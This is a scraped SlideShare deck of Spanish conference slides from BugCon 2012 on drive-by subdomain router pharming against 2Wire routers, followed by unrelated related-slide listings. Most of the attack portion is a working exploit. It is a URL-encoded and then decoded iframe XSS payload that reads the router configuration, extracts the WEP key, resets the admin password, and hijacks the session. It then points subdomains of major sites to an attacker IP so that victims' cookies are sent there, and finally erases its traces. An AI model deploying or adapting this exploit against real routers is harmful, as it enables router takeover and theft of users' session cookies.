SlideShare une entreprise Scribd logo
1  sur  21
Pedro Joaquín (hkm)
BugCon 2012
La victima visita una página web maliciosa que tiene el código
para explotar una vulnerabilidad de router pharming en su
ruteador.
Se redirigen los subdominios de dominios verdaderos a la IP
del atacante.
Se realizan peticiones a los subdominios desde el browser de
la victima.
Las cookies de la victima correspondientes a los dominios
originales son transmitidas a la IP del atacante.
p w n a g e.
<html><body><iframe
src=http://home/xslt?PAGE=A05&THISPAGE=%3C%2fscript%3E%3Cscript%3Eeval%28unescape%28location.href%29%29%3C%2fscript%3E%23%0Aip
%3D%22127.0.0.1%22%3B%0Adominios%3D%5B%27ea.facebook.com%27%2C%20%27ea.google.com%27%2C%20%27ea.youtube.com%27%2C%20%27ea.yaho
o.com%27%2C%20%27ea.blogger.com%27%2C%20%27ea.twitter.com%27%2C%20%20%27ea.taringa.net%27%2C%20%27ea.wordpress.com%27%2C%20%27
ea.linkedin.com%27%2C%20%27ea.amazon.com%27%2C%20%27ea.ba-
k.com%27%5D%3B%0A%0Adocument.write%28%27%3Ctable%20width%3D500%20height%3D500%20bgcolor%3D%23000000%20align%3Dtop%20style%3D%2
2position%3Aabsolute%3B%20top%3A0px%3B%20left%3A0px%3B%20table-
layout%3Afixed%3B%22%3E%3Ctr%3E%3Ctd%20valign%3Dtop%3E%3Cdiv%20id%3D%22ea%22%20style%3D%22color%3A%2300BB00%3B%22%3E%3C%2fdiv%
3E%3C%2ftd%3E%3C%2ftr%3E%3C%2ftable%3E%27%29%3B%0A%0Adocument.getElementById%28%27ea%27%29.innerHTML%20%3D%20%22%3Cpre%3E%3Ch2
%3E2Wire%20subdomain%20pharming%20cookie%20theft%3C%2fh2%3E%3C%2fpre%3E%22%3B%0A%0Adocument.getElementById%28%27ea%27%29.inner
HTML%20%2b%3D%20%22%3Cb%3ESubdominios%20a%20redirigir%3A%3C%2fb%3E%20%22%2bdominios%2b%22%3Cbr%3E%3Cb%3EIP%20del%20server%20qu
e%20almacenar%26aacute%3B%20cookies%3A%3C%2fb%3E%20%22%2bip%2b%22%3Cbr%3EObteniendo%20configuraci%26oacute%3Bn...%3Cbr%3E%22%3
B%20%0A%0Atry%20%7B%20%0A%09xmlhttp%3Dnew%20ActiveXObject%28%22MSXML2.XMLHTTP%22%29%3B%20%0A%7D%20catch%28e%29%20%7B%20%0A%09x
mlhttp%20%3D%20new%20XMLHttpRequest%28%29%20%0A%7D%0Axmlhttp.open%28%22GET%22%2C%22%2fxslt%3Fpage%3Dmgmt_data%22%2Cfalse%29%3B
%0Axmlhttp.send%28null%29%3B%0Avar%20info%20%3D%20xmlhttp.responseText%3B%0Avar%20pass%20%3D%20%22temporal%22%3B%0Avar%20wep%2
0%3D%20info.substr%28info.indexOf%28%22encrypt_key%5C%22%5C%3E0x%22%29%2b15%2C10%29%3B%0Adocument.getElementById%28%27ea%27%29
.innerHTML%20%2b%3D%20%22%3Cb%3EConfiguraci%26oacute%3Bn%20obtenida.%3C%2fb%3E%3Cbr%3EParseando%20WEP...%3Cbr%3E%3Cb%3EWEP%3A%
3C%2fb%3E%20%22%2bwep%2b%22%3Cbr%3ECambiando%20el%20password%20a%20%27temporal%27...%3Cbr%3E%22%3B%20%0Axmlhttp.open%28%22POST
%22%2C%22%2fxslt%22%29%3B%0Axmlhttp.setRequestHeader%28%22Content-type%22%2C%22application%2fx-www-form-
urlencoded%22%29%3B%0Axmlhttp.send%28%22PAGE%3DA04_POST%26THISPAGE%3DA04%26NEXTPAGE%3DA04_POST%26SYSKEY%3D%22%2bwep%2b%22%26PA
SSWORD%3D%22%2bpass%2b%22%26PASSWORD_CONF%3D%22%2bpass%2b%22%26HINT%3D%22%2bpass%29%3B%0Adocument.getElementById%28%27ea%27%29
.innerHTML%20%2b%3D%20%22%3Cb%3EPassword%20%27temporal%27%20establecido.%3C%2fb%3E%3Cbr%3EObteniendo%20sesi%26oacute%3Bn...%3C
br%3E%22%3B%20%0Axmlhttp.open%28%22GET%22%2C%22%2fxslt%3FPAGE%3DA02_POST%26THISPAGE%3D%26NEXTPAGE%3DJ01%26CMSKICK%3D%26PAGE%3D
A02%26NEXTPAGE%3DJ01%26SHOWHINT%3D1%26PASSWORD%3D%22%2bpass%2C%20false%29%3B%0Axmlhttp.send%28null%29%3B%0Adocument.getElement
ById%28%27ea%27%29.innerHTML%20%2b%3D%20%22%3Cb%3ESesion%20obtenida.%3C%2fb%3E%3Cbr%3E%3Cb%3ECookie%3A%20%3C%2fb%3E%22%2bdocum
ent.cookie%2b%22%3Cbr%3ERedirigiendo%20subdominios...%3Cbr%3E%22%3B%20%0Afor%20%28var%20i%3D0%3B%20i%3Cdominios.length%3B%20i%
2b%2b%29%20%7B%0A%09dns%3Ddominios%5Bi%5D%3B%0A%09xmlhttp.open%28%22GET%22%2C%22%2fxslt%3FPAGE%3DJ38_SET%26THISPAGE%3DJ38%26NE
XTPAGE%3DJ38_SET%26NAME%3D%22%2bdns%2b%22%26ADDR%3D%22%2bip%2Cfalse%29%3B%0A%09xmlhttp.send%28null%29%3B%0A%7D%0Adocument.getE
lementById%28%27ea%27%29.innerHTML%20%2b%3D%20%22%3Cb%3EDominios%20redirigidos.%3C%2fb%3E%3Cbr%3EAbriendo%20subdominios%20y%20
enviando%20cookies...%3Cbr%3E%22%3B%20%0Afor%20%28var%20i%3D0%3B%20i%3Cdominios.length%3B%20i%2b%2b%29%20%7B%0A%09dns%3Ddomini
os%5Bi%5D%3B%0A%09document.write%28%27%3Cimg%20src%3Dhttp%3A%2f%2f%27%2bdns%2b%27%3E%27%29%3B%0A%7D%0Adocument.getElementById%
28%27ea%27%29.innerHTML%20%2b%3D%20%22%3Cb%3ECookies%20enviadas.%3C%2fb%3E%3Cbr%3EEliminando%20redirecciones%20de%20subdominio
s...%3Cbr%3E%22%3B%20%0Afor%20%28var%20i%3D20%3B%20i%3Cdominios.length%2b21%3B%20i%2b%2b%29%20%7B%0A%09xmlhttp.open%28%22GET%2
2%2C%22%2fxslt%3FPAGE%3DJ38_DEL%26THISPAGE%3DJ38%26NEXTPAGE%3DJ38_DEL%26NAMEID%3D%22%2bi%2Cfalse%29%3B%0A%09xmlhttp.send%28nul
l%29%3B%0A%7D%0Adocument.getElementById%28%27ea%27%29.innerHTML%20%2b%3D%20%22%3Cb%3ERedirecciones%20eliminadas.%3C%2fb%3E%3Cb
r%3E%3Cbr%3E%3Cb%3EFIN.%3C%2fb%3E%20Que%20tengas%20un%20buen%20dia%20%3A%29%22%3B%20%0A width=500
height=500>2wiro</iframe></body><html>
Explota un XSS para
estar en la misma
zona y obtener la
configuración.
Explota una
revelación de
configuración para
obtener la WEP
Utiliza la función de
resetear el
password con la
WEP.
Obtiene la sesión
de administrador.
Redirige los
subdominios a la IP
de almacenamiento
de cookies.
Realiza peticiones
desde el cliente a
los subdominios
Almacena las
cookies del cliente
Limpia las
redirecciones del
ruteador.
p w n a g e
Explota un XSS para
estar en la misma
zona y obtener la
configuración.
Explota una
revelación de
configuración para
obtener la WEP
Utiliza la función de
resetear el
password con la
WEP.
Obtiene la sesión
de administrador.
Redirige los
subdominios a la IP
de almacenamiento
de cookies.
Realiza peticiones
desde el cliente a
los subdominios
Almacena las
cookies del cliente
Limpia las
redirecciones del
ruteador.
p w n a g e
Explota un XSS para
estar en la misma
zona y obtener la
configuración.
Explota una
revelación de
configuración para
obtener la WEP
Utiliza la función de
resetear el
password con la
WEP.
Obtiene la sesión
de administrador.
Redirige los
subdominios a la IP
de almacenamiento
de cookies.
Realiza peticiones
desde el cliente a
los subdominios
Almacena las
cookies del cliente
Limpia las
redirecciones del
ruteador.
p w n a g e
Explota un XSS para
estar en la misma
zona y obtener la
configuración.
Explota una
revelación de
configuración para
obtener la WEP
Utiliza la función de
resetear el
password con la
WEP.
Obtiene la sesión
de administrador.
Redirige los
subdominios a la IP
de almacenamiento
de cookies.
Realiza peticiones
desde el cliente a
los subdominios
Almacena las
cookies del cliente
Limpia las
redirecciones del
ruteador.
p w n a g e
Explota un XSS para
estar en la misma
zona y obtener la
configuración.
Explota una
revelación de
configuración para
obtener la WEP
Utiliza la función de
resetear el
password con la
WEP.
Obtiene la sesión
de administrador.
Redirige los
subdominios a la IP
de almacenamiento
de cookies.
Realiza peticiones
desde el cliente a
los subdominios
Almacena las
cookies del cliente
Limpia las
redirecciones del
ruteador.
p w n a g e
Explota un XSS para
estar en la misma
zona y obtener la
configuración.
Explota una
revelación de
configuración para
obtener la WEP
Utiliza la función de
resetear el
password con la
WEP.
Obtiene la sesión
de administrador.
Redirige los
subdominios a la IP
de almacenamiento
de cookies.
Realiza peticiones
desde el cliente a
los subdominios
Almacena las
cookies del cliente
Limpia las
redirecciones del
ruteador.
p w n a g e
Explota un XSS para
estar en la misma
zona y obtener la
configuración.
Explota una
revelación de
configuración para
obtener la WEP
Utiliza la función de
resetear el
password con la
WEP.
Obtiene la sesión
de administrador.
Redirige los
subdominios a la IP
de almacenamiento
de cookies.
Realiza peticiones
desde el cliente a
los subdominios
Almacena las
cookies del cliente
Limpia las
redirecciones del
ruteador.
p w n a g e
Explota un XSS para
estar en la misma
zona y obtener la
configuración.
Explota una
revelación de
configuración para
obtener la WEP
Utiliza la función de
resetear el
password con la
WEP.
Obtiene la sesión
de administrador.
Redirige los
subdominios a la IP
de almacenamiento
de cookies.
Realiza peticiones
desde el cliente a
los subdominios
Almacena las
cookies del cliente
Limpia las
redirecciones del
ruteador.
p w n a g e
Explota un XSS para
estar en la misma
zona y obtener la
configuración.
Explota una
revelación de
configuración para
obtener la WEP
Utiliza la función de
resetear el
password con la
WEP.
Obtiene la sesión
de administrador.
Redirige los
subdominios a la IP
de almacenamiento
de cookies.
Realiza peticiones
desde el cliente a
los subdominios
Almacena las
cookies del cliente
Limpia las
redirecciones del
ruteador.
p w n a g e
try { xmlhttp=new ActiveXObject("MSXML2.XMLHTTP"); } catch(e) {xmlhttp = new
XMLHttpRequest()}xmlhttp.open("GET","/xslt?page=mgmt_data",false);xmlhttp.send(
null);var info = xmlhttp.responseText;var pass = "temporal";var wep =
info.substr(info.indexOf("encrypt_key">0x")+15,10);document.getElementById('ea').
innerHTML += "<b>Configuraci&oacute;n obtenida.</b><br>Parseando
WEP...<br><b>WEP:</b> "+wep+"<br>Cambiando el password a 'temporal'...<br>";
xmlhttp.open("POST","/xslt");xmlhttp.setRequestHeader("Content-
type","application/x-www-form-
urlencoded");xmlhttp.send("PAGE=A04_POST&THISPAGE=A04&NEXTPAGE=A04_POST
&SYSKEY="+wep+"&PASSWORD="+pass+"&PASSWORD_CONF="+pass+"&HINT="+pass
);document.getElementById('ea').innerHTML += "<b>Password 'temporal'
establecido.</b><br>Obteniendo sesi&oacute;n...<br>";
xmlhttp.open("GET","/xslt?PAGE=A02_POST&THISPAGE=&NEXTPAGE=J01&CMSKICK=
&PAGE=A02&NEXTPAGE=J01&SHOWHINT=1&PASSWORD="+pass, false);xmlhttp.send(
null);document.getElementById('ea').innerHTML += "<b>Sesion
obtenida.</b><br><b>Cookie: </b>"+document.cookie+"<br>Redirigiendo
subdominios...<br>";
Disponible en Routerpwn desde Junio 2011 !
La victima visita una página web maliciosa que tiene el código
para explotar una vulnerabilidad de router pharming en su
ruteador.
Se redirigen los subdominios de dominios verdaderos a la IP
del atacante.
Se realizan peticiones a los subdominios desde el browser de
la victima.
Las cookies de la victima correspondientes a los dominios
originales son transmitidas a la IP del atacante.
p w n a g e.
<html><body><iframe
src=http://home/xslt?PAGE=A05&THISPAGE=</script><script>eval(un
escape(location.href))</script>#ip="127.0.0.1";dominios=['ea.facebo
ok.com', 'ea.google.com', 'ea.youtube.com', 'ea.yahoo.com', 'ea.blogg
er.com', 'ea.twitter.com', 'ea.taringa.net', 'ea.wordpress.com', 'ea.linke
din.com', 'ea.amazon.com', 'ea.ba-k.com'];document.write('<table
width=500 height=500 bgcolor=#000000 align=top
style="position:absolute; top:0px; left:0px; table-layout:fixed;"><tr><td
valign=top><div id="ea"
style="color:#00BB00;"></div></td></tr></table>');document.getElem
entById('ea').innerHTML = "<pre><h2>2Wire subdomain pharming
cookie theft</h2></pre>";document.getElementById('ea').innerHTML
+= "<b>Subdominios a redirigir:</b> "+dominios+"<br><b>IP del
server que almacenar&aacute; cookies:</b> "+ip+"<br>Obteniendo
configuraci&oacute;n...<br>";
La victima visita una página web maliciosa que tiene el código
para explotar una vulnerabilidad de router pharming en su
ruteador.
Se redirigen los subdominios de dominios verdaderos a la IP
del atacante.
Se realizan peticiones a los subdominios desde el browser de
la victima.
Las cookies de la victima correspondientes a los dominios
originales son transmitidas a la IP del atacante.
p w n a g e.
for (var i=0; i<dominios.length; i++) {
dns=dominios[i];
xmlhttp.open("GET","/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME="+d
ns+"&ADDR="+ip,false);
xmlhttp.send(null);}document.getElementById('ea').innerHTML += "<b>Dominios
redirigidos.</b><br>Abriendo subdominios y enviando cookies...<br>";
for (var i=0; i<dominios.length; i++) {
dns=dominios[i];
document.write('<img src=http://'+dns+'>');}
document.getElementById('ea').innerHTML += "<b>Cookies enviadas.</b><br>Eliminando
redirecciones de subdominios...<br>";
for (var i=20; i<dominios.length+21; i++) {
xmlhttp.open("GET","/xslt?PAGE=J38_DEL&THISPAGE=J38&NEXTPAGE=J38_DEL&NAMEID="
+i,false);
xmlhttp.send(null);}document.getElementById('ea').innerHTML += "<b>Redirecciones
eliminadas.</b><br><br><b>FIN.</b> Que tengas un buen dia :)";
width=500 height=500>2wiro</iframe></body><html>
La victima visita una página web maliciosa que tiene el código
para explotar una vulnerabilidad de router pharming en su
ruteador.
Se redirigen los subdominios de dominios verdaderos a la IP
del atacante.
Se realizan peticiones a los subdominios desde el browser de
la victima.
Las cookies de la victima correspondientes a los dominios
originales son transmitidas a la IP del atacante.
p w n a g e.
La victima visita una página web maliciosa que tiene el código
para explotar una vulnerabilidad de router pharming en su
ruteador.
Se redirigen los subdominios de dominios verdaderos a la IP
del atacante.
Se realizan peticiones a los subdominios desde el browser de
la victima.
Las cookies de la victima correspondientes a los dominios
originales son transmitidas a la IP del atacante.
p w n a g e.
Pedro Joaquín (hkm)
BugCon 2012

Contenu connexe

En vedette

Trabajo practico de internet
Trabajo practico de internetTrabajo practico de internet
Trabajo practico de internetRosi Genia
 
Virus y vacunas informaticas
Virus y vacunas informaticasVirus y vacunas informaticas
Virus y vacunas informaticasandreadiazv
 
Técnicas de representación.
Técnicas de representación.Técnicas de representación.
Técnicas de representación.Pao López
 
Administración de la micro y pequeña empresa presentacion
Administración de la micro y pequeña empresa presentacionAdministración de la micro y pequeña empresa presentacion
Administración de la micro y pequeña empresa presentacionjanete15_4
 
Las áreas como mediaciones necesarias
Las áreas como mediaciones necesariasLas áreas como mediaciones necesarias
Las áreas como mediaciones necesariasyanairaseverino
 
Web 2.0 y educación
Web 2.0 y educaciónWeb 2.0 y educación
Web 2.0 y educaciónLuis Jaya
 
Plan gobierno - Miguel Salim
Plan gobierno - Miguel SalimPlan gobierno - Miguel Salim
Plan gobierno - Miguel Salimmiguel_salim
 
Presentación de presupuesto 2013
Presentación de presupuesto 2013Presentación de presupuesto 2013
Presentación de presupuesto 2013Edwin Zamora
 
Avance Tesis Luisana
Avance Tesis LuisanaAvance Tesis Luisana
Avance Tesis LuisanaLuisana Diaz
 
Proceso de evaluación para el ingreso a la Educación Básica
Proceso de evaluación para el ingreso a la Educación BásicaProceso de evaluación para el ingreso a la Educación Básica
Proceso de evaluación para el ingreso a la Educación BásicaJoel Delfin
 
Fundaciones profundas
Fundaciones profundasFundaciones profundas
Fundaciones profundasMouna Touma
 
Exposicion
ExposicionExposicion
Exposicionolaya6
 
Evaluacion del desempeño
Evaluacion del desempeñoEvaluacion del desempeño
Evaluacion del desempeñoJoel Delfin
 
Catarino sánchez hernández
Catarino sánchez hernándezCatarino sánchez hernández
Catarino sánchez hernándezGeorge Aguilar
 

En vedette (19)

biomoleculas
biomoleculasbiomoleculas
biomoleculas
 
biomoleculas
biomoleculasbiomoleculas
biomoleculas
 
Trabajo practico de internet
Trabajo practico de internetTrabajo practico de internet
Trabajo practico de internet
 
Precentaciôn
PrecentaciônPrecentaciôn
Precentaciôn
 
Todo sobre proyecto
Todo sobre proyectoTodo sobre proyecto
Todo sobre proyecto
 
Virus y vacunas informaticas
Virus y vacunas informaticasVirus y vacunas informaticas
Virus y vacunas informaticas
 
Técnicas de representación.
Técnicas de representación.Técnicas de representación.
Técnicas de representación.
 
Administración de la micro y pequeña empresa presentacion
Administración de la micro y pequeña empresa presentacionAdministración de la micro y pequeña empresa presentacion
Administración de la micro y pequeña empresa presentacion
 
Las áreas como mediaciones necesarias
Las áreas como mediaciones necesariasLas áreas como mediaciones necesarias
Las áreas como mediaciones necesarias
 
Web 2.0 y educación
Web 2.0 y educaciónWeb 2.0 y educación
Web 2.0 y educación
 
Matrimono
MatrimonoMatrimono
Matrimono
 
Plan gobierno - Miguel Salim
Plan gobierno - Miguel SalimPlan gobierno - Miguel Salim
Plan gobierno - Miguel Salim
 
Presentación de presupuesto 2013
Presentación de presupuesto 2013Presentación de presupuesto 2013
Presentación de presupuesto 2013
 
Avance Tesis Luisana
Avance Tesis LuisanaAvance Tesis Luisana
Avance Tesis Luisana
 
Proceso de evaluación para el ingreso a la Educación Básica
Proceso de evaluación para el ingreso a la Educación BásicaProceso de evaluación para el ingreso a la Educación Básica
Proceso de evaluación para el ingreso a la Educación Básica
 
Fundaciones profundas
Fundaciones profundasFundaciones profundas
Fundaciones profundas
 
Exposicion
ExposicionExposicion
Exposicion
 
Evaluacion del desempeño
Evaluacion del desempeñoEvaluacion del desempeño
Evaluacion del desempeño
 
Catarino sánchez hernández
Catarino sánchez hernándezCatarino sánchez hernández
Catarino sánchez hernández
 

Similaire à Drive by subdomain router pharming (2012)

Práctica 3 iptables fran gavilan
Práctica 3 iptables fran gavilanPráctica 3 iptables fran gavilan
Práctica 3 iptables fran gavilanTerrafx9
 
Ey ciber seg uah 2016 freewifi
Ey ciber seg uah 2016   freewifiEy ciber seg uah 2016   freewifi
Ey ciber seg uah 2016 freewifiWiktor Nykiel ✔
 
Practica1 iptables fran_gavilan
Practica1 iptables fran_gavilanPractica1 iptables fran_gavilan
Practica1 iptables fran_gavilanTerrafx9
 
generar nuestra docker machine conectada a nuestro registry mirror y private ...
generar nuestra docker machine conectada a nuestro registry mirror y private ...generar nuestra docker machine conectada a nuestro registry mirror y private ...
generar nuestra docker machine conectada a nuestro registry mirror y private ...César Martín Ortiz Pintado
 
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesLa Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesNextel S.A.
 
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesLa Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesPablo Garaizar
 
Client side attacks in web applications
Client side attacks in web applicationsClient side attacks in web applications
Client side attacks in web applicationsEventos Creativos
 
Generar nuestro local docker container registry server ssl autofirmado
Generar nuestro local docker container registry server  ssl autofirmadoGenerar nuestro local docker container registry server  ssl autofirmado
Generar nuestro local docker container registry server ssl autofirmadoCésar Martín Ortiz Pintado
 
Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript...
Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript...Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript...
Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript...RootedCON
 
DrupalCamp Spain 2018: CSI, autopsia de vulnerabilidades
DrupalCamp Spain 2018: CSI, autopsia de vulnerabilidadesDrupalCamp Spain 2018: CSI, autopsia de vulnerabilidades
DrupalCamp Spain 2018: CSI, autopsia de vulnerabilidadeszekivazquez
 
Hack & Beers - Seguridad en Drupal
Hack & Beers - Seguridad en DrupalHack & Beers - Seguridad en Drupal
Hack & Beers - Seguridad en Drupalzekivazquez
 
Desymfony 2011 - Tutorial #1: Instalacion y primeros pasos
Desymfony 2011 - Tutorial #1: Instalacion y primeros pasosDesymfony 2011 - Tutorial #1: Instalacion y primeros pasos
Desymfony 2011 - Tutorial #1: Instalacion y primeros pasosJavier Eguiluz
 

Similaire à Drive by subdomain router pharming (2012) (20)

Práctica 3 iptables fran gavilan
Práctica 3 iptables fran gavilanPráctica 3 iptables fran gavilan
Práctica 3 iptables fran gavilan
 
Dns spoofing
Dns spoofingDns spoofing
Dns spoofing
 
Ataque Dns spoofing
Ataque Dns spoofingAtaque Dns spoofing
Ataque Dns spoofing
 
Ey ciber seg uah 2016 freewifi
Ey ciber seg uah 2016   freewifiEy ciber seg uah 2016   freewifi
Ey ciber seg uah 2016 freewifi
 
Practica1 iptables fran_gavilan
Practica1 iptables fran_gavilanPractica1 iptables fran_gavilan
Practica1 iptables fran_gavilan
 
Optimización OnPage avanzada
Optimización OnPage avanzadaOptimización OnPage avanzada
Optimización OnPage avanzada
 
RabbitMQ y Symfony
RabbitMQ y SymfonyRabbitMQ y Symfony
RabbitMQ y Symfony
 
Deploying Wordpress
Deploying WordpressDeploying Wordpress
Deploying Wordpress
 
generar nuestra docker machine conectada a nuestro registry mirror y private ...
generar nuestra docker machine conectada a nuestro registry mirror y private ...generar nuestra docker machine conectada a nuestro registry mirror y private ...
generar nuestra docker machine conectada a nuestro registry mirror y private ...
 
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesLa Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
 
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesLa Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
 
Client side attacks in web applications
Client side attacks in web applicationsClient side attacks in web applications
Client side attacks in web applications
 
Generar nuestro local docker container registry server ssl autofirmado
Generar nuestro local docker container registry server  ssl autofirmadoGenerar nuestro local docker container registry server  ssl autofirmado
Generar nuestro local docker container registry server ssl autofirmado
 
Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript...
Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript...Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript...
Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript...
 
Internal.docx
Internal.docxInternal.docx
Internal.docx
 
Ingenia en #XIIIJORNADASCCNCERT: El mito de la tecnología
Ingenia en #XIIIJORNADASCCNCERT: El mito de la tecnologíaIngenia en #XIIIJORNADASCCNCERT: El mito de la tecnología
Ingenia en #XIIIJORNADASCCNCERT: El mito de la tecnología
 
DrupalCamp Spain 2018: CSI, autopsia de vulnerabilidades
DrupalCamp Spain 2018: CSI, autopsia de vulnerabilidadesDrupalCamp Spain 2018: CSI, autopsia de vulnerabilidades
DrupalCamp Spain 2018: CSI, autopsia de vulnerabilidades
 
Hack & Beers - Seguridad en Drupal
Hack & Beers - Seguridad en DrupalHack & Beers - Seguridad en Drupal
Hack & Beers - Seguridad en Drupal
 
Desymfony 2011 - Tutorial #1: Instalacion y primeros pasos
Desymfony 2011 - Tutorial #1: Instalacion y primeros pasosDesymfony 2011 - Tutorial #1: Instalacion y primeros pasos
Desymfony 2011 - Tutorial #1: Instalacion y primeros pasos
 
Team.docx
Team.docxTeam.docx
Team.docx
 

Plus de Websec México, S.C.

Ciberseguridad durante la pandemia [Paulino Calderon]
Ciberseguridad durante la pandemia [Paulino Calderon]Ciberseguridad durante la pandemia [Paulino Calderon]
Ciberseguridad durante la pandemia [Paulino Calderon]Websec México, S.C.
 
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...Websec México, S.C.
 
Estadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
Estadisticas de redes 802.11 en Mexico (2013) por Paulino CalderonEstadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
Estadisticas de redes 802.11 en Mexico (2013) por Paulino CalderonWebsec México, S.C.
 
Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]Websec México, S.C.
 
Old fox new tricks malicious macros are back
Old fox new tricks malicious macros are backOld fox new tricks malicious macros are back
Old fox new tricks malicious macros are backWebsec México, S.C.
 
Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Explotación de vulnerabilidades recientes de Windows - Agosto 2017Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Explotación de vulnerabilidades recientes de Windows - Agosto 2017Websec México, S.C.
 
Mi experiencia en el programa Google Summer of Code
Mi experiencia en el programa Google Summer of CodeMi experiencia en el programa Google Summer of Code
Mi experiencia en el programa Google Summer of CodeWebsec México, S.C.
 
Escribiendo firmas para el sistema de detección de versiones de Nmap
Escribiendo firmas para el sistema de detección de versiones de NmapEscribiendo firmas para el sistema de detección de versiones de Nmap
Escribiendo firmas para el sistema de detección de versiones de NmapWebsec México, S.C.
 
El porqué está fallando tu programa de seguridad informática por Paulino Cald...
El porqué está fallando tu programa de seguridad informática por Paulino Cald...El porqué está fallando tu programa de seguridad informática por Paulino Cald...
El porqué está fallando tu programa de seguridad informática por Paulino Cald...Websec México, S.C.
 
Pwning corporate networks in a single day by Paulino Calderon Pale
Pwning corporate networks in a single day by Paulino Calderon PalePwning corporate networks in a single day by Paulino Calderon Pale
Pwning corporate networks in a single day by Paulino Calderon PaleWebsec México, S.C.
 
CPMX7 Pwneando redes informáticas por Paulino Calderon
CPMX7 Pwneando redes informáticas por Paulino CalderonCPMX7 Pwneando redes informáticas por Paulino Calderon
CPMX7 Pwneando redes informáticas por Paulino CalderonWebsec México, S.C.
 
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...Websec México, S.C.
 
Explotación práctica de señales de radio por Luis Colunga
Explotación práctica de señales de radio por Luis ColungaExplotación práctica de señales de radio por Luis Colunga
Explotación práctica de señales de radio por Luis ColungaWebsec México, S.C.
 
Pentesting 101 por Paulino Calderon
Pentesting 101 por Paulino CalderonPentesting 101 por Paulino Calderon
Pentesting 101 por Paulino CalderonWebsec México, S.C.
 
Obtener contraseñas del directorio activo por hkm
Obtener contraseñas del directorio activo por hkmObtener contraseñas del directorio activo por hkm
Obtener contraseñas del directorio activo por hkmWebsec México, S.C.
 
Recuperacion de defaces con versionador Git por Alevsk
Recuperacion de defaces con versionador Git por Alevsk Recuperacion de defaces con versionador Git por Alevsk
Recuperacion de defaces con versionador Git por Alevsk Websec México, S.C.
 
Seguridad en Bitcoin por Luis Daniel Beltran
Seguridad en Bitcoin por Luis Daniel BeltranSeguridad en Bitcoin por Luis Daniel Beltran
Seguridad en Bitcoin por Luis Daniel BeltranWebsec México, S.C.
 
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto SalgadoCPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto SalgadoWebsec México, S.C.
 
CPMX5 - Las nuevas generaciones de redes por Luis Colunga
CPMX5 - Las nuevas generaciones de redes por Luis ColungaCPMX5 - Las nuevas generaciones de redes por Luis Colunga
CPMX5 - Las nuevas generaciones de redes por Luis ColungaWebsec México, S.C.
 

Plus de Websec México, S.C. (20)

Ciberseguridad durante la pandemia [Paulino Calderon]
Ciberseguridad durante la pandemia [Paulino Calderon]Ciberseguridad durante la pandemia [Paulino Calderon]
Ciberseguridad durante la pandemia [Paulino Calderon]
 
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
 
Estadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
Estadisticas de redes 802.11 en Mexico (2013) por Paulino CalderonEstadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
Estadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
 
Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]
 
Old fox new tricks malicious macros are back
Old fox new tricks malicious macros are backOld fox new tricks malicious macros are back
Old fox new tricks malicious macros are back
 
Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Explotación de vulnerabilidades recientes de Windows - Agosto 2017Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Explotación de vulnerabilidades recientes de Windows - Agosto 2017
 
Mi experiencia en el programa Google Summer of Code
Mi experiencia en el programa Google Summer of CodeMi experiencia en el programa Google Summer of Code
Mi experiencia en el programa Google Summer of Code
 
